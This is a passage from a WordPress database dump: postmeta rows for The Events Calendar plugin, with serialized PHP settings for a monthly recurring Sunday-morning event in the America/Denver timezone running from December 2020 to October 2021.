19:45:00'),(115453,262816,'_EventCost',''),(115454,262816,'_EventURL',''),(115455,262816,'_EventTimezone','America/Denver'),(115456,262816,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:10:{i:262816;a:2:{s:9:\"timestamp\";i:1610268300;s:8:\"duration\";i:4500;}i:262817;a:2:{s:9:\"timestamp\";i:1613292300;s:8:\"duration\";i:4500;}i:262818;a:2:{s:9:\"timestamp\";i:1615711500;s:8:\"duration\";i:4500;}i:262819;a:2:{s:9:\"timestamp\";i:1618130700;s:8:\"duration\";i:4500;}i:262820;a:2:{s:9:\"timestamp\";i:1620549900;s:8:\"duration\";i:4500;}i:262821;a:2:{s:9:\"timestamp\";i:1623573900;s:8:\"duration\";i:4500;}i:262822;a:2:{s:9:\"timestamp\";i:1625993100;s:8:\"duration\";i:4500;}i:262823;a:2:{s:9:\"timestamp\";i:1628412300;s:8:\"duration\";i:4500;}i:262824;a:2:{s:9:\"timestamp\";i:1631436300;s:8:\"duration\";i:4500;}i:262825;a:2:{s:9:\"timestamp\";i:1633855500;s:8:\"duration\";i:4500;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:10;}'),(115441,262816,'_RTECregistrationsDisabled','1'),(115442,262816,'_RTECdeadlineType','start'),(115443,262816,'_RTECwhoCanRegister','any'),(115444,262816,'_RTEClimitRegistrations','0'),(115439,262816,'_EventOrigin','events-calendar'),(115446,262816,'boldgrid_hide_page_title','0'),(115447,262816,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:6:\"Second\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-10\";s:14:\"EventStartDate\";s:19:\"2020-12-13 08:45:00\";s:12:\"EventEndDate\";s:19:\"2020-12-13 10:00:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(115451,262816,'_EventCurrencySymbol',''),(115452,262816,'_EventCurrencyPosition','prefix'),(115448,262816,'_EventShowMapLink','1'),(115449,262816,'_EventShowMap','1'),(115450,262816,'_EventVenueID','262507'),(115437,262816,'protect_children',''),(115438,262816,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1607511336;s:12:\"_EventOrigin\";i:1607511336;s:13:\"_thumbnail_id\";i:1607511336;s:26:\"_RTECregistrationsDisabled\";i:1607511336;s:17:\"_RTECdeadlineType\";i:1607511336;s:19:\"_RTECwhoCanRegister\";i:1607511336;s:23:\"_RTEClimitRegistrations\";i:1607511336;s:21:\"_RTECmaxRegistrations\";i:1607511336;s:24:\"boldgrid_hide_page_title\";i:1607511336;s:16:\"_EventRecurrence\";i:1607511336;s:17:\"_EventShowMapLink\";i:1607511336;s:13:\"_EventShowMap\";i:1607511336;s:13:\"_EventVenueID\";i:1607511336;s:20:\"_EventCurrencySymbol\";i:1607511336;s:22:\"_EventCurrencyPosition\";i:1607511336;s:10:\"_EventCost\";i:1607511336;s:9:\"_EventURL\";i:1607511336;s:14:\"_EventTimezone\";i:1607511336;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607511336;s:16:\"tribe_events_cat\";i:1607536536;}'),(115445,262816,'_RTECmaxRegistrations','30'),(115436,262816,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1607511336;s:12:\"_EventOrigin\";i:1607511336;s:13:\"_thumbnail_id\";i:1607511336;s:26:\"_RTECregistrationsDisabled\";i:1607511336;s:17:\"_RTECdeadlineType\";i:1607511336;s:19:\"_RTECwhoCanRegister\";i:1607511336;s:23:\"_RTEClimitRegistrations\";i:1607511336;s:21:\"_RTECmaxRegistrations\";i:1607511336;s:24:\"boldgrid_hide_page_title\";i:1607511336;s:16:\"_EventRecurrence\";i:1607511336;s:17:\"_EventShowMapLink\";i:1607511336;s:13:\"_EventShowMap\";i:1607511336;s:13:\"_EventVenueID\";i:1607511336;s:20:\"_EventCurrencySymbol\";i:1607511336;s:22:\"_EventCurrencyPosition\";i:1607511336;s:10:\"_EventCost\";i:1607511336;s:9:\"_EventURL\";i:1607511336;s:14:\"_EventTimezone\";i:1607511336;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607511336;s:16:\"tribe_events_cat\";i:1607536536;}'),(115413,262825,'_EventDuration','4500'),(117037,262881,'_RTECregistrationsDisabled','1'),(115411,262825,'_EventEndDate','2021-10-10 10:00:00'),(115410,262825,'_EventStartDateUTC','2021-10-10 14:45:00'),(115169,262817,'_EventStartDate','2021-02-14 08:45:00'),(115170,262817,'_EventStartDateUTC','2021-02-14 15:45:00'),(115171,262817,'_EventEndDate','2021-02-14 10:00:00'),(115412,262825,'_EventEndDateUTC','2021-10-10 16:00:00'),(115172,262817,'_EventEndDateUTC','2021-02-14 17:00:00'),(115173,262817,'_EventDuration','4500'),(116737,262871,'_EventEndDate','2021-01-03 12:45:00'),(115470,262817,'_EventShowMap','1'),(115471,262817,'_EventVenueID','262507'),(115472,262817,'_EventCurrencySymbol',''),(115473,262817,'_EventCurrencyPosition','prefix'),(115474,262817,'_EventCost',''),(115475,262817,'_EventURL',''),(115476,262817,'_EventTimezone','America/Denver'),(115477,262817,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:10:{i:262816;a:2:{s:9:\"timestamp\";i:1610268300;s:8:\"duration\";i:4500;}i:262817;a:2:{s:9:\"timestamp\";i:1613292300;s:8:\"duration\";i:4500;}i:262818;a:2:{s:9:\"timestamp\";i:1615711500;s:8:\"duration\";i:4500;}i:262819;a:2:{s:9:\"timestamp\";i:1618130700;s:8:\"duration\";i:4500;}i:262820;a:2:{s:9:\"timestamp\";i:1620549900;s:8:\"duration\";i:4500;}i:262821;a:2:{s:9:\"timestamp\";i:1623573900;s:8:\"duration\";i:4500;}i:262822;a:2:{s:9:\"timestamp\";i:1625993100;s:8:\"duration\";i:4500;}i:262823;a:2:{s:9:\"timestamp\";i:1628412300;s:8:\"duration\";i:4500;}i:262824;a:2:{s:9:\"timestamp\";i:1631436300;s:8:\"duration\";i:4500;}i:262825;a:2:{s:9:\"timestamp\";i:1633855500;s:8:\"duration\";i:4500;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:10;}'),(151823,266081,'mec_start_day_seconds','68400'),(115462,262817,'_RTECregistrationsDisabled','1'),(115463,262817,'_RTECdeadlineType','start'),(115464,262817,'_RTECwhoCanRegister','any'),(115465,262817,'_RTEClimitRegistrations','0'),(115466,262817,'_RTECmaxRegistrations','30'),(115460,262817,'_EventOrigin','events-calendar'),(115467,262817,'boldgrid_hide_page_title','0'),(115468,262817,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:6:\"Second\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-10\";s:14:\"EventStartDate\";s:19:\"2020-12-13 08:45:00\";s:12:\"EventEndDate\";s:19:\"2020-12-13 10:00:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(115469,262817,'_EventShowMapLink','1'),(115458,262817,'protect_children',''),(115459,262817,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1607511337;s:12:\"_EventOrigin\";i:1607511337;s:13:\"_thumbnail_id\";i:1607511337;s:26:\"_RTECregistrationsDisabled\";i:1607511337;s:17:\"_RTECdeadlineType\";i:1607511337;s:19:\"_RTECwhoCanRegister\";i:1607511337;s:23:\"_RTEClimitRegistrations\";i:1607511337;s:21:\"_RTECmaxRegistrations\";i:1607511337;s:24:\"boldgrid_hide_page_title\";i:1607511337;s:16:\"_EventRecurrence\";i:1607511337;s:17:\"_EventShowMapLink\";i:1607511337;s:13:\"_EventShowMap\";i:1607511337;s:13:\"_EventVenueID\";i:1607511337;s:20:\"_EventCurrencySymbol\";i:1607511337;s:22:\"_EventCurrencyPosition\";i:1607511337;s:10:\"_EventCost\";i:1607511337;s:9:\"_EventURL\";i:1607511337;s:14:\"_EventTimezone\";i:1607511337;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607511337;s:16:\"tribe_events_cat\";i:1607536537;}'),(115457,262817,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1607511337;s:12:\"_EventOrigin\";i:1607511337;s:13:\"_thumbnail_id\";i:1607511337;s:26:\"_RTECregistrationsDisabled\";i:1607511337;s:17:\"_RTECdeadlineType\";i:1607511337;s:19:\"_RTECwhoCanRegister\";i:1607511337;s:23:\"_RTEClimitRegistrations\";i:1607511337;s:21:\"_RTECmaxRegistrations\";i:1607511337;s:24:\"boldgrid_hide_page_title\";i:1607511337;s:16:\"_EventRecurrence\";i:1607511337;s:17:\"_EventShowMapLink\";i:1607511337;s:13:\"_EventShowMap\";i:1607511337;s:13:\"_EventVenueID\";i:1607511337;s:20:\"_EventCurrencySymbol\";i:1607511337;s:22:\"_EventCurrencyPosition\";i:1607511337;s:10:\"_EventCost\";i:1607511337;s:9:\"_EventURL\";i:1607511337;s:14:\"_EventTimezone\";i:1607511337;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607511337;s:16:\"tribe_events_cat\";i:1607536537;}'),(115409,262825,'_EventStartDate','2021-10-10 08:45:00'),(115199,262818,'_EventStartDate','2021-03-14 08:45:00'),(115200,262818,'_EventStartDateUTC','2021-03-14 14:45:00'),(115201,262818,'_EventEndDate','2021-03-14 10:00:00'),(115202,262818,'_EventEndDateUTC','2021-03-14 16:00:00'),(118933,262957,'_EventCurrencySymbol',''),(115203,262818,'_EventDuration','4500'),(116735,262871,'_EventStartDate','2021-01-03 11:30:00'),(118932,262957,'_EventVenueID','262507'),(116736,262871,'_EventStartDateUTC','2021-01-03 18:30:00'),(151822,266081,'mec_start_time_ampm','PM'),(115483,262818,'_RTECregistrationsDisabled','1'),(115484,262818,'_RTECdeadlineType','start'),(115485,262818,'_RTECwhoCanRegister','any'),(115486,262818,'_RTEClimitRegistrations','0'),(115481,262818,'_EventOrigin','events-calendar'),(115488,262818,'boldgrid_hide_page_title','0'),(115489,262818,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:6:\"Second\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-10\";s:14:\"EventStartDate\";s:19:\"2020-12-13 08:45:00\";s:12:\"EventEndDate\";s:19:\"2020-12-13 10:00:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(115490,262818,'_EventShowMapLink','1'),(115491,262818,'_EventShowMap','1'),(115492,262818,'_EventVenueID','262507'),(115493,262818,'_EventCurrencySymbol',''),(115494,262818,'_EventCurrencyPosition','prefix'),(115495,262818,'_EventCost',''),(115496,262818,'_EventURL',''),(115497,262818,'_EventTimezone','America/Denver'),(115498,262818,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:10:{i:262816;a:2:{s:9:\"timestamp\";i:1610268300;s:8:\"duration\";i:4500;}i:262817;a:2:{s:9:\"timestamp\";i:1613292300;s:8:\"duration\";i:4500;}i:262818;a:2:{s:9:\"timestamp\";i:1615711500;s:8:\"duration\";i:4500;}i:262819;a:2:{s:9:\"timestamp\";i:1618130700;s:8:\"duration\";i:4500;}i:262820;a:2:{s:9:\"timestamp\";i:1620549900;s:8:\"duration\";i:4500;}i:262821;a:2:{s:9:\"timestamp\";i:1623573900;s:8:\"duration\";i:4500;}i:262822;a:2:{s:9:\"timestamp\";i:1625993100;s:8:\"duration\";i:4500;}i:262823;a:2:{s:9:\"timestamp\";i:1628412300;s:8:\"duration\";i:4500;}i:262824;a:2:{s:9:\"timestamp\";i:1631436300;s:8:\"duration\";i:4500;}i:262825;a:2:{s:9:\"timestamp\";i:1633855500;s:8:\"duration\";i:4500;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:10;}'),(115479,262818,'protect_children',''),(115480,262818,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1607511337;s:12:\"_EventOrigin\";i:1607511337;s:13:\"_thumbnail_id\";i:1607511337;s:26:\"_RTECregistrationsDisabled\";i:1607511337;s:17:\"_RTECdeadlineType\";i:1607511337;s:19:\"_RTECwhoCanRegister\";i:1607511337;s:23:\"_RTEClimitRegistrations\";i:1607511337;s:21:\"_RTECmaxRegistrations\";i:1607511337;s:24:\"boldgrid_hide_page_title\";i:1607511337;s:16:\"_EventRecurrence\";i:1607511337;s:17:\"_EventShowMapLink\";i:1607511337;s:13:\"_EventShowMap\";i:1607511337;s:13:\"_EventVenueID\";i:1607511337;s:20:\"_EventCurrencySymbol\";i:1607511337;s:22:\"_EventCurrencyPosition\";i:1607511337;s:10:\"_EventCost\";i:1607511337;s:9:\"_EventURL\";i:1607511337;s:14:\"_EventTimezone\";i:1607511337;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607511337;s:16:\"tribe_events_cat\";i:1607536537;}'),(115487,262818,'_RTECmaxRegistrations','30'),(115478,262818,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1607511337;s:12:\"_EventOrigin\";i:1607511337;s:13:\"_thumbnail_id\";i:1607511337;s:26:\"_RTECregistrationsDisabled\";i:1607511337;s:17:\"_RTECdeadlineType\";i:1607511337;s:19:\"_RTECwhoCanRegister\";i:1607511337;s:23:\"_RTEClimitRegistrations\";i:1607511337;s:21:\"_RTECmaxRegistrations\";i:1607511337;s:24:\"boldgrid_hide_page_title\";i:1607511337;s:16:\"_EventRecurrence\";i:1607511337;s:17:\"_EventShowMapLink\";i:1607511337;s:13:\"_EventShowMap\";i:1607511337;s:13:\"_EventVenueID\";i:1607511337;s:20:\"_EventCurrencySymbol\";i:1607511337;s:22:\"_EventCurrencyPosition\";i:1607511337;s:10:\"_EventCost\";i:1607511337;s:9:\"_EventURL\";i:1607511337;s:14:\"_EventTimezone\";i:1607511337;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607511337;s:16:\"tribe_events_cat\";i:1607536537;}'),(115604,262824,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1607511337;s:12:\"_EventOrigin\";i:1607511337;s:13:\"_thumbnail_id\";i:1607511337;s:26:\"_RTECregistrationsDisabled\";i:1607511337;s:17:\"_RTECdeadlineType\";i:1607511337;s:19:\"_RTECwhoCanRegister\";i:1607511337;s:23:\"_RTEClimitRegistrations\";i:1607511337;s:21:\"_RTECmaxRegistrations\";i:1607511337;s:24:\"boldgrid_hide_page_title\";i:1607511337;s:16:\"_EventRecurrence\";i:1607511337;s:17:\"_EventShowMapLink\";i:1607511337;s:13:\"_EventShowMap\";i:1607511337;s:13:\"_EventVenueID\";i:1607511337;s:20:\"_EventCurrencySymbol\";i:1607511337;s:22:\"_EventCurrencyPosition\";i:1607511337;s:10:\"_EventCost\";i:1607511337;s:9:\"_EventURL\";i:1607511337;s:14:\"_EventTimezone\";i:1607511337;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607511337;s:16:\"tribe_events_cat\";i:1607536537;}'),(115606,262824,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1607511337;s:12:\"_EventOrigin\";i:1607511337;s:13:\"_thumbnail_id\";i:1607511337;s:26:\"_RTECregistrationsDisabled\";i:1607511337;s:17:\"_RTECdeadlineType\";i:1607511337;s:19:\"_RTECwhoCanRegister\";i:1607511337;s:23:\"_RTEClimitRegistrations\";i:1607511337;s:21:\"_RTECmaxRegistrations\";i:1607511337;s:24:\"boldgrid_hide_page_title\";i:1607511337;s:16:\"_EventRecurrence\";i:1607511337;s:17:\"_EventShowMapLink\";i:1607511337;s:13:\"_EventShowMap\";i:1607511337;s:13:\"_EventVenueID\";i:1607511337;s:20:\"_EventCurrencySymbol\";i:1607511337;s:22:\"_EventCurrencyPosition\";i:1607511337;s:10:\"_EventCost\";i:1607511337;s:9:\"_EventURL\";i:1607511337;s:14:\"_EventTimezone\";i:1607511337;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607511337;s:16:\"tribe_events_cat\";i:1607536537;}'),(115229,262819,'_EventStartDate','2021-04-11 08:45:00'),(115230,262819,'_EventStartDateUTC','2021-04-11 14:45:00'),(115231,262819,'_EventEndDate','2021-04-11 10:00:00'),(115232,262819,'_EventEndDateUTC','2021-04-11 16:00:00'),(115605,262824,'protect_children',''),(115233,262819,'_EventDuration','4500'),(118931,262957,'_EventShowMap','1'),(115512,262819,'_EventShowMap','1'),(115513,262819,'_EventVenueID','262507'),(115514,262819,'_EventCurrencySymbol',''),(115515,262819,'_EventCurrencyPosition','prefix'),(115516,262819,'_EventCost',''),(115517,262819,'_EventURL',''),(115518,262819,'_EventTimezone','America/Denver'),(115519,262819,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:10:{i:262816;a:2:{s:9:\"timestamp\";i:1610268300;s:8:\"duration\";i:4500;}i:262817;a:2:{s:9:\"timestamp\";i:1613292300;s:8:\"duration\";i:4500;}i:262818;a:2:{s:9:\"timestamp\";i:1615711500;s:8:\"duration\";i:4500;}i:262819;a:2:{s:9:\"timestamp\";i:1618130700;s:8:\"duration\";i:4500;}i:262820;a:2:{s:9:\"timestamp\";i:1620549900;s:8:\"duration\";i:4500;}i:262821;a:2:{s:9:\"timestamp\";i:1623573900;s:8:\"duration\";i:4500;}i:262822;a:2:{s:9:\"timestamp\";i:1625993100;s:8:\"duration\";i:4500;}i:262823;a:2:{s:9:\"timestamp\";i:1628412300;s:8:\"duration\";i:4500;}i:262824;a:2:{s:9:\"timestamp\";i:1631436300;s:8:\"duration\";i:4500;}i:262825;a:2:{s:9:\"timestamp\";i:1633855500;s:8:\"duration\";i:4500;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:10;}'),(115504,262819,'_RTECregistrationsDisabled','1'),(115505,262819,'_RTECdeadlineType','start'),(115506,262819,'_RTECwhoCanRegister','any'),(115507,262819,'_RTEClimitRegistrations','0'),(115508,262819,'_RTECmaxRegistrations','30'),(115502,262819,'_EventOrigin','events-calendar'),(115509,262819,'boldgrid_hide_page_title','0'),(115510,262819,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:6:\"Second\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-10\";s:14:\"EventStartDate\";s:19:\"2020-12-13 08:45:00\";s:12:\"EventEndDate\";s:19:\"2020-12-13 10:00:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(115511,262819,'_EventShowMapLink','1'),(115500,262819,'protect_children',''),(115501,262819,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1607511337;s:12:\"_EventOrigin\";i:1607511337;s:13:\"_thumbnail_id\";i:1607511337;s:26:\"_RTECregistrationsDisabled\";i:1607511337;s:17:\"_RTECdeadlineType\";i:1607511337;s:19:\"_RTECwhoCanRegister\";i:1607511337;s:23:\"_RTEClimitRegistrations\";i:1607511337;s:21:\"_RTECmaxRegistrations\";i:1607511337;s:24:\"boldgrid_hide_page_title\";i:1607511337;s:16:\"_EventRecurrence\";i:1607511337;s:17:\"_EventShowMapLink\";i:1607511337;s:13:\"_EventShowMap\";i:1607511337;s:13:\"_EventVenueID\";i:1607511337;s:20:\"_EventCurrencySymbol\";i:1607511337;s:22:\"_EventCurrencyPosition\";i:1607511337;s:10:\"_EventCost\";i:1607511337;s:9:\"_EventURL\";i:1607511337;s:14:\"_EventTimezone\";i:1607511337;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607511337;s:16:\"tribe_events_cat\";i:1607536537;}'),(115499,262819,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1607511337;s:12:\"_EventOrigin\";i:1607511337;s:13:\"_thumbnail_id\";i:1607511337;s:26:\"_RTECregistrationsDisabled\";i:1607511337;s:17:\"_RTECdeadlineType\";i:1607511337;s:19:\"_RTECwhoCanRegister\";i:1607511337;s:23:\"_RTEClimitRegistrations\";i:1607511337;s:21:\"_RTECmaxRegistrations\";i:1607511337;s:24:\"boldgrid_hide_page_title\";i:1607511337;s:16:\"_EventRecurrence\";i:1607511337;s:17:\"_EventShowMapLink\";i:1607511337;s:13:\"_EventShowMap\";i:1607511337;s:13:\"_EventVenueID\";i:1607511337;s:20:\"_EventCurrencySymbol\";i:1607511337;s:22:\"_EventCurrencyPosition\";i:1607511337;s:10:\"_EventCost\";i:1607511337;s:9:\"_EventURL\";i:1607511337;s:14:\"_EventTimezone\";i:1607511337;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607511337;s:16:\"tribe_events_cat\";i:1607536537;}'),(115259,262820,'_EventStartDate','2021-05-09 08:45:00'),(115260,262820,'_EventStartDateUTC','2021-05-09 14:45:00'),(115261,262820,'_EventEndDate','2021-05-09 10:00:00'),(115262,262820,'_EventEndDateUTC','2021-05-09 16:00:00'),(115263,262820,'_EventDuration','4500'),(117031,262881,'protect_children',''),(115533,262820,'_EventShowMap','1'),(115534,262820,'_EventVenueID','262507'),(115535,262820,'_EventCurrencySymbol',''),(115536,262820,'_EventCurrencyPosition','prefix'),(115537,262820,'_EventCost',''),(115538,262820,'_EventURL',''),(115539,262820,'_EventTimezone','America/Denver'),(115540,262820,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:10:{i:262816;a:2:{s:9:\"timestamp\";i:1610268300;s:8:\"duration\";i:4500;}i:262817;a:2:{s:9:\"timestamp\";i:1613292300;s:8:\"duration\";i:4500;}i:262818;a:2:{s:9:\"timestamp\";i:1615711500;s:8:\"duration\";i:4500;}i:262819;a:2:{s:9:\"timestamp\";i:1618130700;s:8:\"duration\";i:4500;}i:262820;a:2:{s:9:\"timestamp\";i:1620549900;s:8:\"duration\";i:4500;}i:262821;a:2:{s:9:\"timestamp\";i:1623573900;s:8:\"duration\";i:4500;}i:262822;a:2:{s:9:\"timestamp\";i:1625993100;s:8:\"duration\";i:4500;}i:262823;a:2:{s:9:\"timestamp\";i:1628412300;s:8:\"duration\";i:4500;}i:262824;a:2:{s:9:\"timestamp\";i:1631436300;s:8:\"duration\";i:4500;}i:262825;a:2:{s:9:\"timestamp\";i:1633855500;s:8:\"duration\";i:4500;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:10;}'),(151821,266081,'mec_start_time_minutes','0'),(115525,262820,'_RTECregistrationsDisabled','1'),(115526,262820,'_RTECdeadlineType','start'),(115527,262820,'_RTECwhoCanRegister','any'),(115528,262820,'_RTEClimitRegistrations','0'),(115529,262820,'_RTECmaxRegistrations','30'),(115523,262820,'_EventOrigin','events-calendar'),(115530,262820,'boldgrid_hide_page_title','0'),(115531,262820,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:6:\"Second\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-10\";s:14:\"EventStartDate\";s:19:\"2020-12-13 08:45:00\";s:12:\"EventEndDate\";s:19:\"2020-12-13 10:00:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(115532,262820,'_EventShowMapLink','1'),(115521,262820,'protect_children',''),(115522,262820,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1607511337;s:12:\"_EventOrigin\";i:1607511337;s:13:\"_thumbnail_id\";i:1607511337;s:26:\"_RTECregistrationsDisabled\";i:1607511337;s:17:\"_RTECdeadlineType\";i:1607511337;s:19:\"_RTECwhoCanRegister\";i:1607511337;s:23:\"_RTEClimitRegistrations\";i:1607511337;s:21:\"_RTECmaxRegistrations\";i:1607511337;s:24:\"boldgrid_hide_page_title\";i:1607511337;s:16:\"_EventRecurrence\";i:1607511337;s:17:\"_EventShowMapLink\";i:1607511337;s:13:\"_EventShowMap\";i:1607511337;s:13:\"_EventVenueID\";i:1607511337;s:20:\"_EventCurrencySymbol\";i:1607511337;s:22:\"_EventCurrencyPosition\";i:1607511337;s:10:\"_EventCost\";i:1607511337;s:9:\"_EventURL\";i:1607511337;s:14:\"_EventTimezone\";i:1607511337;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607511337;s:16:\"tribe_events_cat\";i:1607536537;}'),(115520,262820,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1607511337;s:12:\"_EventOrigin\";i:1607511337;s:13:\"_thumbnail_id\";i:1607511337;s:26:\"_RTECregistrationsDisabled\";i:1607511337;s:17:\"_RTECdeadlineType\";i:1607511337;s:19:\"_RTECwhoCanRegister\";i:1607511337;s:23:\"_RTEClimitRegistrations\";i:1607511337;s:21:\"_RTECmaxRegistrations\";i:1607511337;s:24:\"boldgrid_hide_page_title\";i:1607511337;s:16:\"_EventRecurrence\";i:1607511337;s:17:\"_EventShowMapLink\";i:1607511337;s:13:\"_EventShowMap\";i:1607511337;s:13:\"_EventVenueID\";i:1607511337;s:20:\"_EventCurrencySymbol\";i:1607511337;s:22:\"_EventCurrencyPosition\";i:1607511337;s:10:\"_EventCost\";i:1607511337;s:9:\"_EventURL\";i:1607511337;s:14:\"_EventTimezone\";i:1607511337;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607511337;s:16:\"tribe_events_cat\";i:1607536537;}'),(115614,262824,'boldgrid_hide_page_title','0'),(115289,262821,'_EventStartDate','2021-06-13 08:45:00'),(115290,262821,'_EventStartDateUTC','2021-06-13 14:45:00'),(115291,262821,'_EventEndDate','2021-06-13 10:00:00'),(115607,262824,'_EventOrigin','events-calendar'),(115292,262821,'_EventEndDateUTC','2021-06-13 16:00:00'),(115293,262821,'_EventDuration','4500'),(117032,262881,'_tribe_modified_fields','a:30:{s:16:\"protect_children\";i:1607512091;s:12:\"_EventOrigin\";i:1607512091;s:10:\"_edit_last\";i:1607512245;s:10:\"post_title\";i:1607512319;s:12:\"post_content\";i:1607512443;s:11:\"post_status\";i:1607512443;s:16:\"tribe_events_cat\";i:1607537643;s:13:\"_thumbnail_id\";i:1607512443;s:26:\"_RTECregistrationsDisabled\";i:1607512443;s:17:\"_RTECdeadlineType\";i:1607512443;s:19:\"_RTECwhoCanRegister\";i:1607512443;s:23:\"_RTEClimitRegistrations\";i:1607512443;s:21:\"_RTECmaxRegistrations\";i:1607512443;s:24:\"boldgrid_hide_page_title\";i:1607512443;s:16:\"_EventRecurrence\";i:1607512443;s:17:\"_EventShowMapLink\";i:1607512443;s:13:\"_EventShowMap\";i:1607512443;s:13:\"_EventVenueID\";i:1607512443;s:15:\"_EventStartDate\";i:1607512443;s:13:\"_EventEndDate\";i:1607512443;s:18:\"_EventStartDateUTC\";i:1607512443;s:16:\"_EventEndDateUTC\";i:1607512443;s:14:\"_EventDuration\";i:1607512443;s:20:\"_EventCurrencySymbol\";i:1607512443;s:22:\"_EventCurrencyPosition\";i:1607512443;s:10:\"_EventCost\";i:1607512443;s:9:\"_EventURL\";i:1607512443;s:14:\"_EventTimezone\";i:1607512443;s:18:\"_EventTimezoneAbbr\";i:1607512443;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607512444;}'),(115554,262821,'_EventShowMap','1'),(115555,262821,'_EventVenueID','262507'),(115556,262821,'_EventCurrencySymbol',''),(115557,262821,'_EventCurrencyPosition','prefix'),(115558,262821,'_EventCost',''),(115559,262821,'_EventURL',''),(115560,262821,'_EventTimezone','America/Denver'),(115561,262821,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:10:{i:262816;a:2:{s:9:\"timestamp\";i:1610268300;s:8:\"duration\";i:4500;}i:262817;a:2:{s:9:\"timestamp\";i:1613292300;s:8:\"duration\";i:4500;}i:262818;a:2:{s:9:\"timestamp\";i:1615711500;s:8:\"duration\";i:4500;}i:262819;a:2:{s:9:\"timestamp\";i:1618130700;s:8:\"duration\";i:4500;}i:262820;a:2:{s:9:\"timestamp\";i:1620549900;s:8:\"duration\";i:4500;}i:262821;a:2:{s:9:\"timestamp\";i:1623573900;s:8:\"duration\";i:4500;}i:262822;a:2:{s:9:\"timestamp\";i:1625993100;s:8:\"duration\";i:4500;}i:262823;a:2:{s:9:\"timestamp\";i:1628412300;s:8:\"duration\"